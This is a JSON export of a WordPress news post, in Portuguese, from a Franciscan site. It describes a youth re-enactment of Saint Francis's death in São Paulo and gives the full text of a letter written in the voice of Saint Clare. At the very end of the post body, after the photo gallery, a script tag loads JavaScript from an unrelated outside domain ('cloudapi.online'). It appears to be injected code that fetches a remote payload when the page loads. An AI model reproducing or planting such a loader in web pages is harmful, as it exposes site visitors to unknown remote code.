{"id":95695,"date":"2015-10-03T23:00:32","date_gmt":"2015-10-04T02:00:32","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=95695"},"modified":"2019-04-23T09:15:31","modified_gmt":"2019-04-23T12:15:31","slug":"jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html","title":{"rendered":"Os \u00faltimos momentos da vida de S\u00e3o Francisco"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg\" alt=\"DSC_0744\" width=\"800\" height=\"532\" \/><br \/>\n<strong>\u00c9rika Augusto<\/strong><br \/>\nS\u00e3o Paulo (SP) &#8211; A bonita Igreja de S\u00e3o Francisco das Chagas recebeu na noite deste s\u00e1bado mais uma edi\u00e7\u00e3o do Tr\u00e2nsito de S\u00e3o Francisco. \u00c9 um costume celebrar na noite do dia 3 de outubro a morte do santo de Assis.<br \/>\nNeste ano os jovens vocacionados e a Jufra das Chagas foram os encarregados da prepara\u00e7\u00e3o da celebra\u00e7\u00e3o, que contou com a ades\u00e3o de muitos fi\u00e9is, que vieram\u00a0participar deste momento significativo. Os frades das 4 fraternidades de S\u00e3o Paulo estavam presentes (Vila Clementino, Pari e S\u00e3o Francisco).<br \/>\nAs Irm\u00e3s Franciscanas de Ingolstadt conduziram a celebra\u00e7\u00e3o, que foi animada por alguns cantos e reflex\u00f5es. A homilia foi proclamada pela Ir. In\u00eas dos Santos Nascimento, que partilhou com os presentes um texto muito po\u00e9tico, escrito em forma de carta, como se fosse ditada por Clara de Assis.<\/p>\n<div id=\"attachment_95702\" style=\"width: 310px\" class=\"wp-caption alignright\"><img aria-describedby=\"caption-attachment-95702\" loading=\"lazy\" class=\"wp-image-95702 size-medium\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/10\/DSC_07191-300x287.jpg\" alt=\"DSC_0719\" width=\"300\" height=\"287\" \/><p id=\"caption-attachment-95702\" class=\"wp-caption-text\">Ir. In\u00eas dos Santos Nascimento<\/p><\/div>\n<p>Ela come\u00e7a: \u201cMeu querido e amado Francisco, a morte me traz a escurid\u00e3o do t\u00famulo, mas me faz mem\u00f3ria do t\u00famulo vazio que Maria Madalena encontrou no dia da ressurrei\u00e7\u00e3o. Sinto sua falta, Francisco. Tenho o vazio que a morte nos tr\u00e1s, mas creio que est\u00e1 presente ainda mais na minha vida, na minha miss\u00e3o e carisma.\u201d<br \/>\nA carta continua, abordando pontos importantes da vida e carisma dos dois santos. O sentimento que se traduz \u00e9 de alegria e louvor. N\u00e3o h\u00e1 tristeza, luto, na passagem de S\u00e3o Francisco de Assis. N\u00e3o cabe tristeza neste momento, pois Francisco sempre tratou a morte com a mesma alegria com que tratava a vida. A proximidade de Cristo, a certeza da ressurrei\u00e7\u00e3o, nos d\u00e3o a alegria de celebrar este momento.<br \/>\nA carta termina com uma frase que convida a todos a continuar o ideal do santo de Assis. \u201cMostra-nos que ainda \u00e9 poss\u00edvel viver a tua pobreza, a tua m\u00edstica, a fraternidade universal.\u201d<br \/>\nEm seguida\u00a0todos foram convidados a se sentarem para assistir ao momento mais aguardado da noite, a encena\u00e7\u00e3o do tr\u00e2nsito. Os jovens vocacionados entraram na igreja carregando Gabriel Nogueira, que foi o escolhido para representar S\u00e3o Francisco de Assis neste ano.<br \/>\n<img loading=\"lazy\" class=\"alignleft wp-image-95698\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/10\/DSC_0761.jpg\" alt=\"DSC_0761\" width=\"400\" height=\"266\" \/><\/p>\n<p>A encena\u00e7\u00e3o transcorreu em clima de ora\u00e7\u00e3o. Frei Alvaci Mendes da Luz narrou os momentos principais, onde Francisco de Assis pede para estar com seus primeiros companheiros para se despedir e deixar seus \u00faltimos pedidos para a ordem.<br \/>\nO sil\u00eancio e a emo\u00e7\u00e3o tomaram conta dos presentes. A encena\u00e7\u00e3o transcorre at\u00e9 o momento final da vida de S\u00e3o Francisco, onde os jovens retornam ent\u00e3o para a entrada da igreja, desta vez com o corpo chagado do santo, carregado numa padiola.<br \/>\nTudo encenado com muita simplicidade, mas com muita como\u00e7\u00e3o. Os cantos ajudaram os presentes a entrarem no clima de ora\u00e7\u00e3o. Ao final da celebra\u00e7\u00e3o todos se saudaram com muita alegria, desejando uma feliz festa de S\u00e3o Francisco de Assis. Todos foram convidados para um lanche, que foi preparado no corredor lateral da Igreja da Ordem Franciscana Secular.<\/p>\n<h3><strong>\u00cdNTEGRA DA CARTA<\/strong><\/h3>\n<p>Queridos Irm\u00e3os e Irm\u00e3s! Paz e Bem!<br \/>\nCarta de Santa Clara para reflex\u00e3o do Tr\u00e2nsito de S\u00e3o Francisco.<br \/>\nMeu querido e amado Francisco!<br \/>\nA morte me traz a escurid\u00e3o do t\u00famulo, mas me faz mem\u00f3ria do t\u00famulo vazio que Maria Madalena encontrou no dia da ressurrei\u00e7\u00e3o.<br \/>\nSinto sua falta Francisco, pelo vazio que a morte traz, mas creio que est\u00e1s presente ainda mais na minha vida, na minha miss\u00e3o e Carisma.<br \/>\nLouvo ao Pai de Jesus Cristo pela minha voca\u00e7\u00e3o. Louvo a Jesus Cristo que se fez caminho na pobreza. Louvo com alegria a Francisco que mostrou que \u00e9 poss\u00edvel viver o \u00a0Evangelho na Pobreza e pureza de cora\u00e7\u00e3o.<br \/>\nFa\u00e7o mem\u00f3ria dos nossos encontros Francisco, nossos abra\u00e7os, nossos di\u00e1logos, nossos olhares e todo amor humano e divino presente em n\u00f3s.<br \/>\nFrancisco querido, morto na tarde, mas vivo no Esp\u00edrito. Quero fazer a vontade do Pai e a tua, meu bem aventurado Francisco. Ser tua \u201cplantinha\u201d foi o meu existir na servid\u00e3o de Amada de Deus Pai em Jesus Cristo Pobre, espelho da Eternidade. Ser a serva na pobreza de S\u00e3o Dami\u00e3o.<br \/>\nFrancisco me mostrou que o caminho para Cristo \u00e9 a pobreza e eu nunca deixei de viver este privil\u00e9gio.<br \/>\nPobre e amado Francisco, tu est\u00e1s vivo, \u00e9s real e trago em minha mem\u00f3ria tua sensibilidade com a vida, com a exist\u00eancia mortal, pequena e pecadora. Tudo que contemplava era motivo para louvar o grande, onipotente e bom Senhor! E louvava! Deus est\u00e1 presente em toda criatura. Puro cora\u00e7\u00e3o!<br \/>\nN\u00e3o sei falar de Deus Pai, do Cristo Esposo, sem lembrar de Francisco.<br \/>\nFrancisco! Quanto mais me alimento do Cristo Crucificado, mais abro minha mente, alma e cora\u00e7\u00e3o para o sofrimento que hoje passamos:<\/p>\n<ul>\n<li>O sofrimento da indiferen\u00e7a pela cria\u00e7\u00e3o de Deus;<\/li>\n<li>O sofrimento do individualismo, que escraviza;<\/li>\n<li>O sofrimento da superficialidade que carrega o fardo do medo de se encontrar com o mais profundo do ser;<\/li>\n<li>Francisco, Irm\u00e3o de todas as criaturas;<\/li>\n<li>Francisco livre para ser servo de toda criatura;<\/li>\n<li>Francisco que adentra no \u201cConvento do monte Alverne, para usufruir da grandeza do Cristo Pobre e Crucificado\u201d;<\/li>\n<li>Francisco que se encontra com a Irm\u00e3 morte para deixar o legado de uma exist\u00eancia eterna;<\/li>\n<\/ul>\n<p>Est\u00e1s em tudo, e em todos Francisco, dizendo que \u00e9 poss\u00edvel viver apaixonadamente o Evangelho, \u00e9 poss\u00edvel trazer Jesus para um mundo que necessita do maior sonho do Crucificado: o Reino de Deus!<br \/>\nTu existes Francisco, em todo ecossistema que sofre a dor do parto, em meio a drag\u00f5es do poder que buscam engolir vidas para satisfazer um sistema ego\u00edsta cheio de sofrimento.<br \/>\nAinda \u00e9 poss\u00edvel te viver Francisco! \u00c9s um projeto de vida! Sua morte nos diz que fizeste a tua parte, e nos convoca a buscarmos viver a nossa parte, hoje.<br \/>\nPai Francisco!<\/p>\n<ul>\n<li>Olhe pelos consagrados (as), neste ano t\u00e3o belo, dedicado \u00e0 Vida Consagrada;<\/li>\n<li>Olhe para o Frades Menores;<\/li>\n<li>Olhe pelas Clarissas;<\/li>\n<li>Olhe pela Ordem Franciscana Secular, pelas fam\u00edlias, leigos consagrados que buscam viver o Evangelho;<\/li>\n<li>Olhe pela JUFRA;<\/li>\n<li>Olhe pelos simpatizantes;<\/li>\n<li>Olhe pela Igreja, na pessoa do nosso querido Papa Francisco.<\/li>\n<\/ul>\n<p>Mostra-nos\u00a0 que ainda \u00e9 poss\u00edvel viver a tua pobreza, tua m\u00edstica, a fraternidade universal.<br \/>\nAm\u00e9m!<br \/>\nVEJA MAIS FOTOS DA CELEBRA\u00c7\u00c3O:<br \/>\n<img class=\"ngg_displayed_gallery mceItem\" src=\"http:\/\/franciscanos.org.br\/index.php\/nextgen-attach_to_post\/preview\/id--95819\" alt=\"\" \/><br \/>\n<script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Festa de S. Francisco<\/p>\n","protected":false},"author":1,"featured_media":202966,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[444,40,1249,726],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Festa de S. Francisco\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2015-10-04T02:00:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-23T12:15:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg\",\"width\":273,\"height\":181,\"caption\":\"????????????????????????????????????\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html\",\"name\":\"Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#primaryimage\"},\"datePublished\":\"2015-10-04T02:00:32+00:00\",\"dateModified\":\"2019-04-23T12:15:31+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Os \u00faltimos momentos da vida de S\u00e3o Francisco\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html","og_locale":"pt_BR","og_type":"article","og_title":"Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos","og_description":"Festa de S. Francisco","og_url":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2015-10-04T02:00:32+00:00","article_modified_time":"2019-04-23T12:15:31+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/10\/DSC_0744.jpg","width":273,"height":181,"caption":"????????????????????????????????????"},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html","name":"Os \u00faltimos momentos da vida de S\u00e3o Francisco - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#primaryimage"},"datePublished":"2015-10-04T02:00:32+00:00","dateModified":"2019-04-23T12:15:31+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/jovens-encenam-ultimos-momentos-da-vida-de-sao-francisco.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Os \u00faltimos momentos da vida de S\u00e3o Francisco"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/95695"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=95695"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/95695\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/202966"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=95695"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=95695"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=95695"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}